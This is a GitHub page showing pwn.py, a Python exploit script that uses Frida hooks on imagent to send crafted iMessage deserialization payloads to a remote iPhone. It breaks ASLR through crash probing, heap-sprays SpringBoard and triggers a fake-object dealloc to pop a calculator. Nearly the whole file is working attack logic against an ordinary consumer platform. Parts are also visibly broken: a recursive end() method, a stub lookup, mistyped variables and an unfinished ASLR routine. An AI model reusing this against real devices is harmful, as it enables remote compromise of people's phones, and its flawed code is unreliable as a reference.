-
Notifications
You must be signed in to change notification settings - Fork 0
/
pwn.py
230 lines (175 loc) · 7.64 KB
/
pwn.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
import frida
import random
import subprocess
import sys
import time
import os
CRASH_DELAY = 10
HEAPSPRAY_ADDR = 0x140000000
SHARED_CACHE_BASE = None
SHARED_CACHE_WRITABLE_REGION_OFFSET = 0x31acc00
TARGET_APPLE_ID = 'foo@bar.baz'
# The class representing a target device to which iMessages can be sent.
class Device:
def __init__(self, apple_id):
self.apple_id = apple_id
self.ready = False
self._delivery_receipts = 0
# Set up frida hooking of imagent to inject our payloads
session = frida.attach('imagent')
code = open('./hook.js', 'r').read()
script = session.create_script(code)
script.on('message', self._on_message)
script.load()
while not self.ready:
time.sleep(1)
def send_message(self, message):
self._delivery_receipts = 0
subprocess.check_call(['osascript', 'sendMessage.applescript', self.apple_id, message])
while self._delivery_receipts == 0:
time.sleep(1)
# Send the current payload as the ATI key, which will be deserialized in imagent
# Wait until the message has been received or the waiting time surpass CRASH_DELAY.
def send_payload_to_imagent(self):
return self._send_payload('ATI')
# Send the current payload as the BP key, which will be deserialized in Springboard.
# Wait until the message has been received or the waiting time surpass CRASH_DELAY
def send_payload_to_springboard(self):
return self._send_payload('BP')
def _send_payload(self, key):
self._delivery_receipts = 0
subprocess.check_call(['osascript', 'sendMessage.applescript', self.apple_id, f'INJECT_{key}'])
count = 0
while self._delivery_receipts == 0 and count < CRASH_DELAY:
time.sleep(1)
count += 1
return self._delivery_receipts > 0
# The handler to cope with receiving message
def _on_message(self, message, data):
if message['type'] == 'send':
payload = message['payload']
if payload == 'READY':
self.ready = True
elif payload == 'DELIVERY_RECEIPT':
self._delivery_receipts += 1
else:
pass
# The generator class to generate different NSUnarchiver payload and write it to /private/var/tmp/com.apple.message/payload
class Payloads:
@staticmethod
def generate_calcpop_heapspray_payload(shared_cache_base):
subprocess.check_call(['./gen_payload_calcpop.py', hex(shared_cache_base)])
# Convert to binary format to save a few bytes.
subprocess.check_call(['plutil', '-convert', 'binary1', '/private/var/tmp/com.apple.message/payload'])
@staticmethod
def generate_kernelpanic_heapspray_payload(shard_cache_base):
subprocess.check_call(['/gen_payload_kernelpanic.py', hex(shared_cache_base)])
# Convert to binary format to save a few bytes.
subprocess.check_call(['plutil', '-convert', 'binary1', '/private/var/tmp/com.apple.message/payload'])
@staticmethod
def generate_addr_deref_payload(addr):
subprocess.check_call(['/gen_payload_deref.py', hex(addr)])
@staticmethod
def generate_fakeobj_dealloc_trigger(addr):
subprocess.check_call(['/gen_fakeobj_dealloc.py', hex(addr)])
class SharedCacheProfile:
def __init__(self, zero_map, ptr_map, tp_map):
assert(len(zero_map) == len(ptr_map) == len(tp_map))
self.base = 0x180000000
self.zero_map = zero_map
self.ptr_map = ptr_map
self.tp_map = tp_map
def map(self, new_base):
self.base = new_base
def start(self):
return self.base
def end(self):
return self.end()
def size(self):
return len(self.zero_map) * 8 * 8
def __str__(self):
return f'SharedCacheProfile profile mapped between 0x{self.start()} and 0x{self.end()}'
def isNull(self, address):
return self._bitmap_lookup(address, self.zero_map)
def isTaggedPtr(self, address):
return self._bitmap_lookup(address, self.tp_map)
def isPointer(self, address):
return self._bitmap_lookup(address, self.ptr_map)
def _bitmap_lookup(self, address, bitmap):
pass
# The function sends crash payload to walk over the address range in which the shared cache is
# mapped in 128MB steps until it finds a valid address
def find_valid_shared_cache_address(target):
# Find the valid shared cache from 0x180000000 to 0x280000000
start = 0x180000000
end = 0x280000000
step = 128 * 1024 * 1024
print('[INFO]: Trying to find a valid address ...')
for address in range(start, end, step):
print(f'Testing address 0x{address} ...')
Payloads.generate_addr_deref_payload(address)
if target.send_payload_to_imagent():
print(f'[INFO]: 0x{address} is valid!')
return address
raise Exception('Couldn\'t find a valid address ...')
def break_aslr(target):
found_address = find_valid_shared_cache_address(target)
print('[INFO]: Start breaking your ASLR, please wait ...')
# We now have a valid address inside the shared_cache. With that, and the binary profile
# of the shared cache, we can now construct a list of candidate slide offsets.
shared_cache_nullmap = open('./shared_cache_profile/shared_cache_nullmap.bin', 'rb').read()
shared_cache_ptrmap = open('./shared_cache_profile/shared_cache_ptrmap.bin', 'rb').read()
shared_cache_tpmap = open('./shared_cache_profile/shared_cache_tpmap.bin', 'rb').read()
shared_cache = SharedCacheProfile(shared_cache_nullmap, shared_cache_ptrmap, shared_cache_tpmap)
possible_base_addresses = []
page_size = 0x4000
min_base = 0x280000000
max_base = 0x180000000
for candidate in range(shared_cache.start(), shared_cache.end(), page_size):
if shared_cache.isNull(candidate) or shared_cache.isTaggedPtr(candidate):
base_address = found_address - (candidate - shared_cache.start())
if base_address > max_base and base_address + shared_cache.size() < min_base:
possible_base_addresses.append(base_address)
print(f'[INFO]: Have {len(possible_base_addresses)} potential candidates for the dyld shared cache slide')
candidates = []
for address in possible_base_addresses:
candidate = SharedCacheProfile(shared_cache_nullmap, shared_cache_ptrmap, shared_cache_tpmap)
candidate.map(address)
if candidate.start() < min_base:
min_base = candidate.start()
if candidate.end() > max_base:
max_base = candidate.end()
assert(candidate.isNull(found_address) or candidate.isTaggedPtr(found_address))
candidates.append(candidate)
assert(min_base < max_base)
print(f'[INFO]: Shared cache is mapped somewhere between 0x{min_base} and 0x{max_base}')
print(f'[INFO]: Now determining exact base address of shared cache ...')
# TODO: determine the exact base address of shared cache
def pwn(target):
print(f'[Info]: Start to exploit remote iPhone {TARGET_APPLE_ID} ...')
os.makedirs('/private/var/tmp/com.apple.messages/', exist_ok=True)
shared_cache_base = SHARED_CACHE_BASE
# Obtain
if shared_cache_base is None:
print('[Info]: Break ASLR ...')
shared_cache_base = break_aslr(target)
print(f'[Info]: Shared cache is mapped at 0x{shared_cache_base}')
target.send_message(f'Your shared cache starts at 0x{shared_cache_base}')
input('[Info]: Press enter to continue ...')
print('[Info]: Generate payload to pop calculator ...')
Payloads.generate_calcpop_heapspray_payload(shared_cache_base)
SPRAYSIZE = 768 * 1024 * 1024
MSGSIZE = 32 * 1024 * 1024
NUM_SPRAY = SPRAYSIZE // MSGSIZE
for i in range(NUM_SPRAY):
target.send_payload_to_springboard()
time.sleep(1)
print(f'[Info]: Sending heap spray part {i + 1}/{NUM_SPRAY}')
time.sleep(10)
target.send_message('Enjoy the calculator!!')
print('[Info]: Open calculator successfully!')
Payloads.generate_fakeobj_dealloc_trigger(HEAPSPRAY_ADDR + 0x3ff8)
target.send_payload_to_springboard()
time.sleep(1000)
target = Device(TARGET_APPLE_ID)
pwn(target)